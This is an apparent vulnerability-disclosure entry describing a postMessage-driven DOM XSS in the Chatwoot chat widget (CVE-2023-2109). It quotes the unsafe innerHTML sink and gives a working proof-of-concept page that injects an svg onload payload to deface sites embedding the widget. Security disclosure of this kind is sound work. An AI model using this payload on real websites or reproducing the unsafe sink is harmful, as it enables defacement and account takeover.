Lucene search
Renwax23FD5999FD-B1FD-44B4-AE2E-8F95B5C3D1B6HistoryFeb 02, 2023 - 10:18 p.m.
XSS via postMessage to deface any website and account takeover
2023-02-0222:18:41
renwax23
www.huntr.dev
55
xss
postmessage
chatwoot
website defacement
account takeover
automation
vulnerability discovery
proof of concept
EPSS
0.001
Percentile
43.7%
Description
Hey Chatwoot team, while looking for vulnerabilities I found a critical XSS which allow us to XSS/Deface any website which uses the chat, this can be automated to attack thousands of websites
Vulnerable Code
Inside this function https://github.com/chatwoot/chatwoot/blob/30fcb47477481772c9a447f7406af3a72be26ed1/app/javascript/sdk/bubbleHelpers.js#L16
We have this code:
export const setBubbleText = bubbleText => {
if (isExpandedView(window.$chatwoot.type)) {
const textNode = document.getElementById('woot-widget--expanded__text');
textNode.innerHTML = bubbleText;
}
};
The code uses dangerous JS function innerHTML with bubbleText value the problem is we control value of this variable inside the postMessage function.
Proof of Concept
<body onclick=x()><h1>Click here
<script>
var w;
function x(){
w=window.open('https://www.chatwoot.com/','w');
setTimeout(()=>{
w.postMessage(`chatwoot-widget:{"event":"setBubbleLabel","label":"<svg><svg/onload='document.body.innerHTML="<br><br><h1 style=color:red;font-size:99px>pwned"'>"}`,'*')
}
,5000)
}
</script>
Online POC
Thanks
Renwa
Related
prion
prion
Cross site scripting
2023-04-17 01:15:00
cve
cve
CVE-2023-2109
2023-04-17 01:15:06
cnvd
cnvd
chatwoot Cross-Site Scripting Vulnerability (CNVD-2023-29696)
2023-04-20 00:00:00
cvelist
cvelist
CVE-2023-2109 Cross-site Scripting (XSS) - DOM in chatwoot/chatwoot
2023-04-17 00:00:00
nvd
nvd
CVE-2023-2109
2023-04-17 01:15:06
osv
osv
CVE-2023-2109
2023-04-17 01:15:06